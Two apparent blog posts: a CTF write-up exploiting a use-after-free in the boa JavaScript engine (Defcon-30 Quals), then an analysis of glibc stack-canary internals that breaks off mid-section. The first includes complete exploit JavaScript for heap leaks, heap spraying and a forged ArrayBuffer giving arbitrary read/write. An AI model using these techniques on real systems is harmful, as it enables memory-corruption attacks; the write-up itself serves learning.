- Methods @0x729fbc609310
- Array Buffer Data @0x729fbc61e800

JsValue @0x729fbc61d2a0
Object @0x729fbc6e8ca8
- Methods @0x729fbc609310
- Array Buffer Data @0x729fbc61e900

JsValue @0x729fbc61d2e0
Object @0x729fbc6e8e28
- Methods @0x729fbc609310
- Array Buffer Data @0x729fbc61ea00

we can tell that for a JSObject of type ArrayBuffer, the Object struct occupies 0x180 bytes (including chunk metadata, and likewise below). That is the struct shown here:

pub struct Object {
    /// The type of the object.
    pub data: ObjectData,
    /// The collection of properties contained in the object
    properties: PropertyMap,
    /// Instance prototype `__proto__`.
    prototype: JsPrototype,
    /// Whether it can have new properties added to it.
    extensible: bool,
    /// The `[[PrivateElements]]` internal slot.
    private_elements: FxHashMap,
}

In this way it is fairly easy to find out how much memory a given JS type actually occupies.
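
The spacing measurement can be automated. The sketch below parses the console.debug text shown above and prints the distance between consecutive Object addresses; it assumes the output format stays exactly as in that listing.

```javascript
// Estimate an allocation's footprint from the spacing of consecutive "Object @" addresses.
// The text is copied from the console.debug output shown earlier.

const debugOutput = `
JsValue @0x729fbc61d260
Object @0x729fbc6e8b28
- Methods @0x729fbc609310
- Array Buffer Data @0x729fbc61e800

JsValue @0x729fbc61d2a0
Object @0x729fbc6e8ca8
- Methods @0x729fbc609310
- Array Buffer Data @0x729fbc61e900

JsValue @0x729fbc61d2e0
Object @0x729fbc6e8e28
- Methods @0x729fbc609310
- Array Buffer Data @0x729fbc61ea00
`;

// Collect every address on a line of the form "Object @0x...".
const objectAddrs = [...debugOutput.matchAll(/^Object @0x([0-9a-f]+)$/gm)]
  .map((m) => BigInt("0x" + m[1]));

// Distance between each address and the one before it.
const strides = objectAddrs.slice(1).map((addr, i) => addr - objectAddrs[i]);
console.log(strides.map((s) => "0x" + s.toString(16)));
```

A constant stride across several allocations suggests the objects were placed back to back; an irregular stride usually means other allocations were interleaved and more samples are needed.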

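Now the second question. When an ArrayBuffer is allocated during the spray, boa allocates both the ArrayBuffer object (0x180 bytes) and the backing store (size chosen by the user, subject to alignment). Naturally we want the backing store to land in the UAF memory, not the ArrayBuffer object allocated alongside it. So the UAF object must not be 0x180 bytes in size.

Building an object whose size is not 0x180 is simple. The Object struct of the empty object {} already takes 0x180 bytes, so any nested object such as {a:{}} brings the Object struct to 0x300 bytes. The more complex the structure, the larger the Object struct.

Let us try the spray for real: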

// tools wrapper
let log = (x) => { console.log(x) };
let debug = (x) => { log(console.debug(x)) };
let gc = () => console.collectGarbage();
let bp = () => console.sysbreak();
let sleep = (x) => console.sleep(x);
let hex = (x) => ("0x" + x.toString(16));

// parse tools
// let get_js_value = (obj) => 
//     Number.parseInt(console.debug(obj).split("JsValue @")[1].split("\n")[0]);
let get_obj_addr = (obj) => 
    Number.parseInt(console.debug(obj).split("Object @")[1].split("\n")[0]);
let get_method_addr = (obj) => 
    Number.parseInt(console.debug(obj).split("Methods @")[1].split("\n")[0]);
let get_buffer_data_addr = (obj) => 
    Number.parseInt(console.debug(obj).split("Buffer Data @")[1].split("\n")[0]);

let fake_timeout = { valueOf() {
    log("[+] fake_timeout called");
    sleep(2000);
    gc();

    return 0; 
}};

let new_cache = new TimedCache();
new_cache.set('spray', {a:{}}, 1000);
let new_uaf_obj = new_cache.get("spray", fake_timeout);
debug(new_uaf_obj)
log("")

// let spray_obj = null;
let spray_objs = [];
for(let i = 0; i < 10; i++) {
    let obj = new ArrayBuffer(0x300);
    debug(obj);
    log("")
    spray_objs.push(obj);
}

bp();

Output:

JsValue @0x7a7ecde1d090
Object @0x7a7ecdee7aa8      // <----- 1
- Methods @0x7a7ecde09310


JsValue @0x7a7ecde1d0e0
Object @0x7a7ecdee7aa8      // <----- 2
- Methods @0x7a7ecde09310
- Array Buffer Data @0x7a7ecdec6000

JsValue @0x7a7ecde1d120
Object @0x7a7ecdee80a8
- Methods @0x7a7ecde09310
- Array Buffer Data @0x7a7ecdec6300

JsValue @0x7a7ecde1d160
Object @0x7a7ecdee8228
- Methods @0x7a7ecde09310
- Array Buffer Data @0x7a7ecdec6600
...

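Awkward: the hole was taken by the ArrayBuffer's Object. My rough guess is that Rust's allocation strategy is first-fit: when allocating 0x180 it found a 0x300 chunk that could be split neatly, and took from it.

After some struggling, the allocation finally worked: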

// ...
let new_cache = new TimedCache();
new_cache.set('spray', {a:{},b:{}}, 1000);
let new_uaf_obj = new_cache.get("spray", fake_timeout);
debug(new_uaf_obj)
log("")

let spray_objs = [];
for(let i = 0; i < 10; i++) {
    let obj = new ArrayBuffer(0x180);
    debug(obj);
    log("")
    spray_objs.push(obj);
}

Output:

JsValue @0x73dcb281d0c0
Object @0x73dcb28e8228     <----- 1
- Methods @0x73dcb2809310


JsValue @0x73dcb281d0a0
Object @0x73dcb28e83a8
- Methods @0x73dcb2809310
- Array Buffer Data @0x73dcb28e8200  <----- 2
...

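The main change is that the object stored in the TimedCache went from {a:{}} to {a:{}, b:{}}, which grows the Object struct from 0x300 to 0x480 bytes. When the ArrayBuffer Object is allocated first, the allocator no longer carves it out of the freed 0x480 chunk right away but takes memory from elsewhere. Then, when the 0x180-byte backing store is allocated second, a piece is carved out of the hole, and 0x180 happens to be the minimum size of an Object struct.

To check that the hole was really taken, add debug(uaf_obj) at the end of the JS code and look at the output: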

JsValue @0x701d8021d110
Object @0x701d802f0228
- Methods @0x0

A freshly allocated ArrayBuffer zeroes all of its memory, so the Methods address of uaf_obj is now a null pointer, which confirms that the spray succeeded.

d. fake obj

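We now occupy the hole left by the freed Object. Noticing that boa has an RWX mapping, we can try placing shellcode there and executing it:

This RWX mapping is a bit odd: in some cases it lacks write permission, in others it has it.
Under certain conditions there may even be two RWX mappings. Curious.

So the trickier task now is building arbitrary read/write primitives. We can start by setting the method pointer of the forged obj and try to build a fake ArrayBuffer:

From debugging and the debug output, the method pointer of the fake obj is at offset 0x11 * 8 bytes.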

let ab = new ArrayBuffer(0x50);
views.setBigInt64(8 * 0x11, BigInt(get_method_addr(ab)), true);
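
Since every forged field is written through a DataView, the littleEndian flag deserves a quick check. The sketch below runs in any standard JavaScript engine; the slot index comes from the text above, while the pointer value is just a sample Methods address from earlier output.

```javascript
// DataView slot writes: the third argument of setBigUint64 is the littleEndian flag.
// x86-64 stores pointers little-endian, so forged fields are written with `true`.

const backing = new ArrayBuffer(0x180);  // same size as the sprayed backing store
const view = new DataView(backing);
const SLOT = 0x11;                       // slot index of the method pointer
const fakePointer = 0x729fbc609310n;     // sample address, for illustration only

view.setBigUint64(8 * SLOT, fakePointer, true);

// The bytes now sit in memory order, least significant byte first.
const raw = new Uint8Array(backing, 8 * SLOT, 8);
console.log([...raw].map((b) => b.toString(16).padStart(2, "0")).join(" "));

// Reading back with the flag omitted interprets the same bytes as big-endian.
const littleEndianRead = view.getBigUint64(8 * SLOT, true);
const bigEndianRead = view.getBigUint64(8 * SLOT);
console.log(littleEndianRead === fakePointer, bigEndianRead === fakePointer);
```

A get/set pair that both omit the flag still round-trips a value, but the bytes in memory are then reversed relative to what native code expects, which matters as soon as the written value is meant to be consumed as a pointer.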

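But doing only this, without changing the Object's enum kind to ArrayBuffer, raises an exception when the ArrayBuffer is used:

Uncaught "TypeError": "buffer must be an ArrayBuffer"

I tried to construct a complete ArrayBuffer, but with only the previously leaked heap addresses that is nearly impossible, because the internal structure is far too complex:

It involves heap, stack, and binary addresses, yet so far only heap addresses are available. The stack and binary base addresses would have to be leaked as well to finish building the fake obj.

So how do we leak the stack and binary base addresses? The same old trick again: dump the freed chunk and see whether it holds anything useful. Interestingly, as the exp grew, the leak primitive that originally yielded only two heap pointers suddenly began to leak a binary address as well:

That leaves us with two heap base addresses and the load base of the binary, but still no stack pointer. However, the program panics instead of segfaulting, which suggests that the pointers inside the ArrayBuffer are not used at all; otherwise an invalid pointer dereference would crash it outright.

If the pointers are unused, we can try simply filling in some made-up data and see what happens. First we need the offset of ObjectKind inside the ObjectData struct. The debugger shows that the offset is 0:

Then set some non-pointer data (probably enums and the like) and try an arbitrary read: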

// 3. fake obj
let views = new DataView(spray_objs[0]);
// try to restore the data
let ab = new ArrayBuffer(0x100);
// ArrayBuffer ptr
let ptr = base_addr

// Object Kind (ArrayBuffer)
views.setBigUint64(8 * 0x05, 0x02n, true);        
// Target pointer
views.setBigUint64(8 * 0x06, BigInt(ptr), true);
// some size
views.setBigUint64(8 * 0x07, 0x100n, true);
views.setBigUint64(8 * 0x08, 0x100n, true);
views.setBigUint64(8 * 0x09, 0x100n, true);
views.setBigUint64(8 * 0x0a, 0x101n, true);
views.setBigUint64(8 * 0x11, BigInt(get_method_addr(ab)), true);

debug(ab);
debug(new_uaf_obj)

let new_view = new DataView(new_uaf_obj);
for(let i = 0; i < new_view.byteLength / 8; i++)
    log(new_view.getBigUint64(8 * i).toString(16))

bp();

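Output:

The fake object is now recognized as an ArrayBuffer, and the ELF header was read from the binary's base address. The arbitrary read primitive is done!

But writing through the fake obj triggers a panic:

thread 'main' panicked at 'Object already borrowed: BorrowMutError', boa_engine/src/builtins/dataview/mod.rs:684:40

Debugging reveals the offset of this self.flags field relative to the ArrayBuffer; after setting it to 0 the panic goes away:

Next, though, comes a null pointer dereference in the GC... The backtrace shows that the crash happens because, when BigUint64Array tries to obtain a mut reference, it triggers the GC logic of the fake obj, which starts recursively marking the data structures of its fields. The fake obj still has some problems and was not fully restored, so the crash occurs when trace recurses into PropertyMap:

Let us see whether the GC can be bypassed. Reading the code shows that as long as the condition guarding this root call is not met, the GC is bypassed:

And that condition is tied to the self.flags value we just set. Setting it to 0 was exactly the wrong choice (facepalm); it should be 1. With that in place we can move on to writing memory:

The figure above shows a SIGSEGV during the write, which is entirely expected: the memory holding the ELF header is not writable, so the write aborts.

Try a different address: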

// test read and write
views.setBigUint64(8 * 0x06, BigInt(base_addr + 0x1218000), true);
log(new_view.getBigUint64(0).toString(16));
new_view.setBigUint64(0, 0x1122334455667788n);
log(new_view.getBigUint64(0).toString(16));

views.setBigUint64(8 * 0x06, BigInt(base_addr + 0x1218100), true);
log(new_view.getBigUint64(0).toString(16));
new_view.setBigUint64(0, 0x33445566778899aan);
log(new_view.getBigUint64(0).toString(16));

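As you can see, the value was written to the target memory:

The arbitrary write primitive is done!

VI. Follow-up

With arbitrary read/write primitives in hand, the rest of the exploit is grunt work. They can be used to leak the stack, libc, and any other address, and also to lay out a ROP chain in the data segment and hijack control flow via a stack pivot to get a shell, so I will not go into detail.

Below is the code for the arbitrary read/write primitives. Note that this exp was tested on my local machine, so some offsets and the heap layout may differ.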

// tools wrapper
let log = (x) => { console.log(x) };
let debug = (x) => { log(console.debug(x)) };
let gc = () => console.collectGarbage();
let bp = () => console.sysbreak();
let sleep = (x) => console.sleep(x);
let hex = (x) => ("0x" + x.toString(16));

// parse tools
// let get_js_value = (obj) => 
//     Number.parseInt(console.debug(obj).split("JsValue @")[1].split("\n")[0]);
let get_obj_addr = (obj) => 
    Number.parseInt(console.debug(obj).split("Object @")[1].split("\n")[0]);
let get_method_addr = (obj) => 
    Number.parseInt(console.debug(obj).split("Methods @")[1].split("\n")[0]);
let get_buffer_data_addr = (obj) => 
    Number.parseInt(console.debug(obj).split("Buffer Data @")[1].split("\n")[0]);

let fake_timeout = { valueOf() {
    log("[+] fake_timeout called");
    sleep(2000);
    gc();

    return 0; 
}};

// 1. leak heap addresses
let cache = new TimedCache();
cache.set('leak', new Uint32Array(20), 1000);
let uaf_obj = cache.get("leak", fake_timeout);

debug(uaf_obj);
log(uaf_obj.length)
// for (let i = 0; i < uaf_obj.length; ++i) {
//     log(i + " => " + uaf_obj[i]);
// }

lower_heap_addr = uaf_obj[3] * 0x100000000 + uaf_obj[2] - 0x440f0;
base_addr = uaf_obj[5] * 0x100000000 + uaf_obj[4] - 0x11a9678;
higher_heap_addr = uaf_obj[17] * 0x100000000 + uaf_obj[16] - 0x1f07;
log("[+] lower_heap_addr: " + hex(lower_heap_addr)); 
log("[+] higher_heap_addr: " + hex(higher_heap_addr));
log("[+] base_addr: " + hex(base_addr));
if (((lower_heap_addr | higher_heap_addr | base_addr) & 0xfff) != 0) {
    log("[-] Error wrong addr.")
    bp(); // quit
}
log("[+] Leak successfully.")

// 2. heap spray
let new_cache = new TimedCache();
new_cache.set('spray', {a:{}, b:{}}, 1000);
let new_uaf_obj = new_cache.get("spray", fake_timeout);
debug(new_uaf_obj)

let spray_objs = [];
// In fact a single allocation is enough
for(let i = 0; i < 1; i++) {
    let obj = new ArrayBuffer(0x180);
    debug(obj);
    spray_objs.push(obj);
}

if (get_buffer_data_addr(spray_objs[0]) + 0x28 != get_obj_addr(new_uaf_obj)) {
    log("[-] Error heap spray failed.")
    bp(); // quit
}
log("[+] Heap spray successfully.")


// 3. fake obj
let views = new DataView(spray_objs[0]);
// // debug write
for(let i = 0; i < views.byteLength / 8; i++)
    views.setBigUint64(8*i, BigInt(i*0x10000 + i), true);
// try to restore the data
let ab = new ArrayBuffer(0x100);
// ArrayBuffer ptr
let ptr = base_addr

// mem chunk header
views.setBigUint64(8 * 0x00, 0x00n, true);
views.setBigUint64(8 * 0x01, BigInt(lower_heap_addr + 0x440f0), true);
views.setBigUint64(8 * 0x02, BigInt(base_addr + 0x11a9678), true);
views.setBigUint64(8 * 0x03, 0x100n, true);
// mut borrow flag
views.setBigUint64(8 * 0x04, 0x01n, true);

// Object Kind (ArrayBuffer)
views.setBigUint64(8 * 0x05, 0x02n, true);        
// Target pointer
views.setBigUint64(8 * 0x06, BigInt(ptr), true);

// some size
views.setBigUint64(8 * 0x07, 0x100n, true);
views.setBigUint64(8 * 0x08, 0x100n, true);
views.setBigUint64(8 * 0x09, 0x100n, true);
views.setBigUint64(8 * 0x0a, 0x101n, true);

views.setBigUint64(8 * 0x0e, BigInt(ptr), true);
views.setBigUint64(8 * 0x0f, 0x100n, true);
views.setBigUint64(8 * 0x10, 0x100n, true);
views.setBigUint64(8 * 0x11, BigInt(get_method_addr(ab)), true);
views.setBigUint64(8 * 0x13, BigInt(base_addr + 0xeab740), true);

views.setBigUint64(8 * 0x1a, 0x08n, true);
views.setBigUint64(8 * 0x21, 0x08n, true);

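// Note: the third argument of setBigUint64 is the littleEndian flag. The BigInt passed
// there only acts as a truthy value, so these three calls store 0x08 (little-endian)
// into slots 0x13, 0x17 and 0x1e, overwriting the pointer written to slot 0x13 above.
views.setBigUint64(8 * 0x13, 0x08n, BigInt(base_addr + 0xeab740));
views.setBigUint64(8 * 0x17, 0x08n, BigInt(base_addr + 0xeab740));
views.setBigUint64(8 * 0x1e, 0x08n, BigInt(base_addr + 0xeab740));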

debug(ab);
debug(new_uaf_obj);
// bp();

let new_view = new DataView(new_uaf_obj);

// test read and write
views.setBigUint64(8 * 0x06, BigInt(base_addr + 0x1218000), true);
log(new_view.getBigUint64(0).toString(16));
new_view.setBigUint64(0, 0x1122334455667788n);
log(new_view.getBigUint64(0).toString(16));

views.setBigUint64(8 * 0x06, BigInt(base_addr + 0x1218100), true);
log(new_view.getBigUint64(0).toString(16));
new_view.setBigUint64(0, 0x33445566778899aan);
log(new_view.getBigUint64(0).toString(16));

bp();

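That concludes the review of this challenge. The main takeaway was learning some of Rust's characteristics at the binary level, and with this challenge I have taken a first small step into Rust pwn.

VII. References

This review relied throughout on the r3kapig Defcon-30-Quals document and the discussion in the group chat. Thanks to everyone at r3kapig!

A Brief Analysis of the Canary Mechanism in Linux Programs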

2022-08-24T16:00:00.000Z

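I. Introduction

I had long been curious about how the canary is implemented on Linux, but never got around to looking into it. That curiosity peaked when I learned that the canary can be tampered with by modifying a child thread's thread-local storage, so I decided to study it properly.

It has been a long time since my last blog post, so this is just a brief record.

II. What is a canary

The canary is a stack protection mechanism that detects, when a function returns, whether the current stack has been corrupted. When a function call pushes a new stack frame, the compiler places a random value at the bottom of the new frame, and when the function returns and leaves the frame it checks whether that value has been altered. If it has, a stack overflow has occurred and the program exits:

Interestingly, to keep the canary from being leaked by string-output functions such as printf, its lowest byte is always \x00.

When canary verification fails, the compiler-emitted code calls __stack_chk_fail. For user-space programs this function is implemented in glibc; it prints some information and terminates the program. Because it prints the program path taken from argv[0], an attacker who controls the overflow length can overwrite the argv[0] pointer at the bottom of the stack and use the __stack_chk_fail trigger to leak information.

Note that canaries are also used in the Linux kernel. If a stack overflow is detected while kernel code is running, control flow calls the kernel's own __stack_chk_fail, which in effect calls panic to halt the kernel. There are already articles covering the kernel's use of canaries, so I will not repeat that here.

III. Digging into glibc

This analysis is based on glibc-2.23. The version is on the old side, but the principles have not changed.

Let us go through it step by step.

1. Where the canary comes from

The assignment of the canary can be found in __libc_start_main in csu\libc-start.c: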

  /* Set up the stack checker's canary.  */
  uintptr_t stack_chk_guard = _dl_setup_stack_chk_guard (_dl_random);
# ifdef THREAD_SET_STACK_GUARD
  THREAD_SET_STACK_GUARD (stack_chk_guard);
# else
  __stack_chk_guard = stack_chk_guard;
# endif

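Here _dl_random is the address of random data provided by the kernel:

/* Random data provided by the kernel.  */
void *_dl_random;

As for exactly when this kernel-provided random data is set up, all that can be said is that it happens before the dynamic linker is loaded (a very early point in time). The call chain leading to the assignment is as follows:

elf\rtld.c: the RTLD_START macro, the main entry point of the dynamic linker.

sysdeps\x86_64\dl-machine.h: the actual asm definition of RTLD_START. The dynamic linker's implementation involves assembly, so each architecture needs its own assembly code. From the comments and the code, the dynamic linker first calls _dl_start, continues into _dl_start_user for some initialization, and then jumps to the ELF entry address of the user program: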

/* Initial entry point code for the dynamic linker.
  The C function `_dl_start' is the real entry point;
  its return value is the user program's entry point.  */
#define RTLD_START asm ("\n\
.text\n\
  .align 16\n\
.globl _start\n\
.globl _dl_start_user\n\
_start:\n\
  movq %rsp, %rdi\n\
  call _dl_start\n\
_dl_start_user:\n\

  ...

  # And make sure %rsp points to argc stored on the stack.\n\
  movq %r13, %rsp\n\
  # Jump to the user's entry point.\n\
  jmp *%r12\n\
.previous\n\
");

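elf\rtld.c: _dl_start -> _dl_start_final -> _dl_sysdep_start: _dl_sysdep_start calls some platform-dependent functions for initialization and calls dl_main to obtain the actual entry address of the user program. What matters to us here, however, is not those operations but this for loop: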

ElfW(Addr)
_dl_sysdep_start (void **start_argptr,
     void (*dl_main) (const ElfW(Phdr) *phdr, ElfW(Word) phnum,
          ElfW(Addr) *user_entry, ElfW(auxv_t) *auxv))
{
  ...
  DL_FIND_ARG_COMPONENTS (start_argptr, _dl_argc, _dl_argv, _environ,
         GLRO(dl_auxv));
  for (av = GLRO(dl_auxv); av->a_type != AT_NULL; set_seen (av++))
    ...
   case AT_RANDOM:
   _dl_random = (void *) av->a_un.a_val;
   break;
    ...
  ...
}

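start_argptr points to the argc, argv, env, and auxv data the dynamic linker was invoked with, and the DL_FIND_ARG_COMPONENTS macro sorts these into the corresponding variables _dl_argc, _dl_argv, _environ, and _dl_auxv. So besides the three familiar arguments, the dynamic linker receives one more: auxv.

This extra argument, the auxiliary vector, is an array of data that assists program execution, and it is essential. It carries a lot of useful information; here we only care about AT_RANDOM, the random data from the kernel. This is where that value is assigned to _dl_random, which is later used to generate the canary.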
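
The loop over auxv amounts to scanning (type, value) pairs until AT_NULL. Below is a sketch of that scan in JavaScript over a synthetic buffer, assuming the 64-bit layout where each entry is two 8-byte little-endian words; findAuxv and the sample address are made up for illustration.

```javascript
// Walk an auxiliary vector laid out as (type, value) pairs of 64-bit words.
// The buffer is synthetic; on Linux the real bytes of a process are in /proc/<pid>/auxv.

const AT_NULL = 0n;    // terminator entry
const AT_PAGESZ = 6n;  // included only to give the sample a second entry
const AT_RANDOM = 25n; // address of 16 random bytes supplied by the kernel

function findAuxv(buffer, wantedType) {
  const view = new DataView(buffer);
  for (let off = 0; off + 16 <= buffer.byteLength; off += 16) {
    const type = view.getBigUint64(off, true);
    const value = view.getBigUint64(off + 8, true);
    if (type === AT_NULL) break;
    if (type === wantedType) return value;
  }
  return undefined;
}

// Build a sample vector: AT_PAGESZ, AT_RANDOM (made-up stack address), AT_NULL.
const sample = new ArrayBuffer(48);
const writer = new DataView(sample);
[[AT_PAGESZ, 4096n], [AT_RANDOM, 0x7ffd12345678n], [AT_NULL, 0n]].forEach(([t, v], i) => {
  writer.setBigUint64(16 * i, t, true);
  writer.setBigUint64(16 * i + 8, v, true);
});

const randomPtr = findAuxv(sample, AT_RANDOM);
console.log("0x" + randomPtr.toString(16));
```

Note that the AT_RANDOM entry holds a pointer to the random bytes, not the bytes themselves, which is why _dl_random is declared as a void pointer.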

Back in __libc_start_main, once the random data is available, the logic that actually generates the canary is:

// sysdeps\unix\sysv\linux\dl-osinfo.h
static inline uintptr_t __attribute__ ((always_inline))
_dl_setup_stack_chk_guard (void *dl_random)
{
  union
  {
    uintptr_t num;
    unsigned char bytes[sizeof (uintptr_t)];
  } ret;

  /* We need in the moment only 8 bytes on 32-bit platforms and 16
     bytes on 64-bit platforms.  Therefore we can use the data
     directly and not use the kernel-provided data to seed a PRNG.  */
  memcpy (ret.bytes, dl_random, sizeof (ret));
#if BYTE_ORDER == LITTLE_ENDIAN
  ret.num &= ~(uintptr_t) 0xff;
#elif BYTE_ORDER == BIG_ENDIAN
  ret.num &= ~((uintptr_t) 0xff << (8 * (sizeof (ret) - 1)));
#else
# error "BYTE_ORDER unknown"
#endif
  return ret.num;
}

As shown, the canary is taken directly from the bytes at dl_random, except that its lowest byte is forced to \x00 to prevent leaks, which matches what we observed earlier.
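
The little-endian branch is easy to mirror in a few lines. This is a sketch with made-up random bytes standing in for the 16 bytes that AT_RANDOM points to; setupStackChkGuard is a hypothetical name chosen to echo the C function.

```javascript
// Mirror of the little-endian branch: copy the first 8 bytes, then clear the lowest byte.

function setupStackChkGuard(randomBytes) {
  const view = new DataView(Uint8Array.from(randomBytes.slice(0, 8)).buffer);
  const num = view.getBigUint64(0, true);     // memcpy into a little-endian uintptr_t
  return num & ~0xffn & 0xffffffffffffffffn;  // ret.num &= ~(uintptr_t) 0xff
}

// Sample input only; real values come from the kernel.
const randomBytes = [0xde, 0xad, 0xbe, 0xef, 0x01, 0x23, 0x45, 0x67,
                     0x89, 0xab, 0xcd, 0xef, 0x10, 0x32, 0x54, 0x76];
const canary = setupStackChkGuard(randomBytes);

console.log("0x" + canary.toString(16).padStart(16, "0"));
```

On a little-endian machine the cleared byte is the first byte of the canary in memory, so a string function that reads up to the canary stops there instead of printing it.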

2. Where the canary is stored

Again we start from __libc_start_main:

  /* Set up the stack checker's canary.  */
  uintptr_t stack_chk_guard = _dl_setup_stack_chk_guard (_dl_random);
# ifdef THREAD_SET_STACK_GUARD
  THREAD_SET_STACK_GUARD (stack_chk_guard);
# else
  __stack_chk_guard = stack_chk_guard;
# endif

If the THREAD_SET_STACK_GUARD macro is defined, i.e. the stack guard is kept per thread, the canary value is stored in thread-local storage:

// sysdeps\x86_64\nptl\tls.h
/* Set the stack guard field in TCB head.  */
# define THREAD_SET_STACK_GUARD(value) \
    THREAD_SETMEM (THREAD_SELF, header.stack_guard, value)

Here THREAD_SELF refers to the thread control block of the current thread:

// sysdeps\x86_64\nptl\tls.h
/* Return the thread descriptor for the current thread.

   The contained asm must *not* be marked volatile since otherwise
   assignments like
  pthread_descr self = thread_self();
   do not get optimized away.  */
# define THREAD_SELF \
  ({ struct pthread *__self;                  \
     asm ("mov %%fs:%c1,%0" : "=r" (__self)           \
    : "i" (offsetof (struct pthread, header.self)));        \
     __self;})

The pthread struct is declared as follows; according to the comment, struct pthread is the thread control block structure:

/* Thread descriptor data structure.  */
struct pthread
{
  union
  {
#if !TLS_DTV_AT_TP
    /* This overlaps the TCB as used for TLS without threads (see tls.h).  */
    tcbhead_t header;
#else
    struct
    {
      ...
    } header;
#endif

    /* This extra padding has no special purpose, and this structure layout
       is private and subject to change without affecting the official ABI.
       We just have it here in case it might be convenient for some
       implementation-specific instrumentation hack or suchlike.  */
    void *__padding[24];
  };

  ...
}

On x86_64, the TLS_DTV_AT_TP macro is defined as 0:

// sysdeps\x86_64\nptl\tls.h

/* The TCB can have any size and the memory following the address the
   thread pointer points to is unspecified.  Allocate the TCB there.  */
# define TLS_TCB_AT_TP  1
# define TLS_DTV_AT_TP  0

so the first field of struct pthread is tcbhead_t header:

// sysdeps\x86_64\nptl\tls.h

typedef struct
{
  void *tcb;    /* Pointer to the TCB.  Not necessarily the
         thread descriptor used by libpthread.  */
  dtv_t *dtv;
  void *self;   /* Pointer to the thread descriptor.  */
  int multiple_threads;
  int gscope_flag;
  uintptr_t sysinfo;
  uintptr_t stack_guard;
  uintptr_t pointer_guard;
  
  ... 
} tcbhead_t;

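In tcbhead_t we find the familiar stack_guard field, which is where a thread's canary value lives. The tcb and self pointers actually point to the same address, namely the struct pthread (or equivalently the tcbhead_t itself, since the two share the same address).

Looking back at the THREAD_SELF macro, it is easy to infer that the %fs register holds the address of struct pthread, and that %fs:28h refers to pthread::tcbhead_t::stack_guard, consistent with what IDA showed earlier.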
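
The 0x28 offset can be double-checked by adding up the fields that precede stack_guard. The sketch below assumes the x86-64 LP64 sizes (8-byte pointers and uintptr_t, 4-byte int) and natural alignment, and models only the fields listed in the excerpt.

```javascript
// Compute field offsets for the leading members of tcbhead_t on x86-64.

const fields = [
  ["tcb", 8], ["dtv", 8], ["self", 8],
  ["multiple_threads", 4], ["gscope_flag", 4],
  ["sysinfo", 8], ["stack_guard", 8], ["pointer_guard", 8],
];

const offsets = {};
let cursor = 0;
for (const [name, size] of fields) {
  cursor = Math.ceil(cursor / size) * size; // align each field to its own size
  offsets[name] = cursor;
  cursor += size;
}

console.log("self at 0x" + offsets.self.toString(16));
console.log("stack_guard at 0x" + offsets.stack_guard.toString(16));
```

The same arithmetic puts self at 0x10, which is the constant that THREAD_SELF feeds into its mov from %fs.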

I am not sure, though, why getting the address of struct pthread has to take such a detour through the self pointer in its header...

Why does %fs hold the address of struct pthread? Take a look at this macro:

/* Code to initially initialize the thread pointer.  This might need
   special attention since 'errno' is not yet available and if the
   operation can cause a failure 'errno' must not be touched.

   We have to make the syscall for both uses of the macro since the
   address might be (and probably is) different.  */
# define TLS_INIT_TP(thrdescr) \
  ({ void *_thrdescr = (thrdescr);                \
     tcbhead_t *_head = _thrdescr;               \
     int _result;                 \
                        \
     _head->tcb = _thrdescr;                   \
     /* For now the thread descriptor is at the same address.  */       \
     _head->self = _thrdescr;                  \
                        \
     /* It is a simple syscall to set the %fs value for the thread.  */       \
     asm volatile ("syscall"                  \
       : "=a" (_result)               \
       : "0" ((unsigned long int) __NR_arch_prctl),           \
         "D" ((unsigned long int) ARCH_SET_FS),         \
         "S" (_thrdescr)                \
       : "memory", "cc", "r11", "cx");             \
                        \
    _result ? "cannot set %fs base address for thread-local storage" : 0;     \
  })

# define TLS_DEFINE_INIT_TP(tp, pd) void *tp = (pd)

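The TLS_INIT_TP macro issues the arch_prctl system call with ARCH_SET_FS, setting the %fs base to the address of the pthread structure passed in. As the code shows, the macro also stores the address of the thread control block into both the tcb and self pointer fields.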

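So when is TLS_INIT_TP invoked to install the main thread's TCB into %fs? There are two cases:

During dl_main, when some condition requires TLS early, so it is initialized ahead of time.
During __libc_start_main, through the __pthread_initialize_minimal -> __libc_setup_tls call chain.

Either way, this is done before the canary is created. The second case in particular sits right next to the canary creation step. The whole sequence now fits together:

Before running dl_main, the dynamic linker initializes the _dl_random random bytes.
Before the canary is created, control flow executes the TLS_INIT_TP macro, pointing %fs at the main thread's thread control block.
Inside __libc_start_main, control flow derives the canary value from _dl_random and stores it in the canary field of the thread control block that %fs designates.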

3. Reading the Canary

That covers how the canary is written into the main thread's TLS. How is it read back? sysdeps\x86_64\stackguard-macros.h contains the following macro:

#define STACK_CHK_GUARD \
  ({ uintptr_t x;           \
     asm ("mov %%fs:%c1, %0" : "=r" (x)     \
    : "i" (offsetof (tcbhead_t, stack_guard))); x; })

So the STACK_CHK_GUARD macro is all it takes to read the current thread's canary value, for example:

if (stack_chk_guard_copy != STACK_CHK_GUARD)
{
    puts ("STACK_CHK_GUARD changed between constructor and do_test");
    return 1;
}

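If the THREAD_SET_STACK_GUARD macro is not defined, i.e. the canary is not kept in the thread control block, the computed canary value is stored in the global variable __stack_chk_guard instead:

// excerpt from __libc_start_main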

  /* Set up the stack checker's canary.  */
  uintptr_t stack_chk_guard = _dl_setup_stack_chk_guard (_dl_random);
# ifdef THREAD_SET_STACK_GUARD
  THREAD_SET_STACK_GUARD (stack_chk_guard);
# else
  // here!
  __stack_chk_guard = stack_chk_guard;
# endif

It can still be obtained through the STACK_CHK_GUARD macro:

// sysdeps\generic\stackguard-macros.h
    
extern uintptr_t __stack_chk_guard;
#define STACK_CHK_GUARD __stack_chk_guard

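STACK_CHK_GUARD has almost no uses inside glibc. My guess is that the macro exists to prepare for the canary-reading code that gcc inserts at compile time.

4. Location of the TCB

a. Main thread

Allocating memory for the main thread's TCB is fairly complicated, and there are two paths:

One is the __libc_start_main -> __pthread_initialize_minimal -> __libc_setup_tls call chain, which calls __sbrk to allocate the TLS on the heap.
The other is rtld's _dl_allocate_tls_storage function, which calls mmap to allocate the TLS.

For most programs, though, the TCB seems to be allocated early inside rtld rather than after control reaches the user entry. I wrote a quick program and debugged it, and the main thread's TLS was indeed created through mmap:

gdb cannot read the %fs base directly; reading the register returns 0:

So we have gdb call pthread_self to obtain the current thread's TCB address. The function is simple: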

pthread_t
__pthread_self (void)
{
  return (pthread_t) THREAD_SELF;
}

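Here we can see that the canary the user program loads from %fs:28h matches the canary stored in the main thread's TCB, confirming the earlier analysis:

Conclusion: the main thread's TLS sits at a fairly random location, so changing the main thread's canary by modifying its TLS is almost impossible.

b. Child threads

To see how the TCB and canary work for child threads, we have to move on to the implementation of pthread_create. It lives in nptl\pthread_create.c and comes in two versions, __pthread_create_2_0 and __pthread_create_2_1. Since 2.0 is just a wrapper around 2.1, we focus on the 2.1 implementation.

Only the interesting fragments are shown here: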

  struct pthread *pd = NULL;
